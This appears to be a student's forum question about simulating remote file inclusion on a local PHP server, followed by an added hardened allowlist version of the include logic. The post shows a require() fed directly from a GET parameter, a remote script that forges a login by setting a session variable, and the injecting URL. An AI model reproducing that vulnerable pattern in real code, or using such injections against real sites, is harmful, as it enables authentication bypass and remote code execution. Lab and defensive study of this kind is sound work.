I'm trying to simulate a remote file inclusion attack on my local web server as part of a course I am taking. I got the idea of being able to "log in" on a website I set up without really logging in via the system, but rather by just setting the appropriate session variables in a remote script and then including it in the code of my website. Now I got the script to be included and run on my website (I can echo strings etc.), but I cannot seem to set session variables using the remote script. Does anybody have any idea why?
Here is the code of the website so far:
index.php:
<?php session_start(); ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<?php require("php/imageupload.php"); ?>
<p>Logged in as: <?php echo $_SESSION['username']; ?></p>
</body>
</html>
imageupload.php:
<?php
session_start();
$file = $_GET["file"];
require($file);
?>
hack.php (remote file):
<?php
session_start();
$_SESSION['username'] = "foo";
echo "test";
?>
When I request http://localhost/index.php?file=http://127.0.0.1/hack.php
I get the following response:
test
Logged in as:
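A defensive counterpart to the `require($file)` pattern in imageupload.php above, as an added example that is not part of the original post: the request parameter only selects a key from a fixed allowlist and is never passed to `require` itself. The `pages/` directory, the allowlist entries and the helper `resolve_include` are hypothetical names chosen for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hardened include logic for a script like imageupload.php.
// PAGE_DIR and ALLOWED_PAGES are assumptions, not taken from the original site.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'upload'  => 'upload_form.php',
    'gallery' => 'gallery.php',
];

/**
 * Map a request value to an absolute file path, or null if it is not allowed.
 * URLs, stream wrappers and relative paths never match an allowlist key.
 */
function resolve_include(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing on disk
    }

    // Defence in depth: the resolved file must live inside PAGE_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// $_GET values can be arrays (?file[]=x); accept strings only.
$raw = $_GET['file'] ?? null;
$target = resolve_include(is_string($raw) ? $raw : null);

if ($target === null) {
    http_response_code(400);
    exit('Unknown page');
}

require $target;
```

Independently of the code, keeping `allow_url_include = Off` in php.ini (the default) prevents `require` and `include` from fetching `http://` URLs at all.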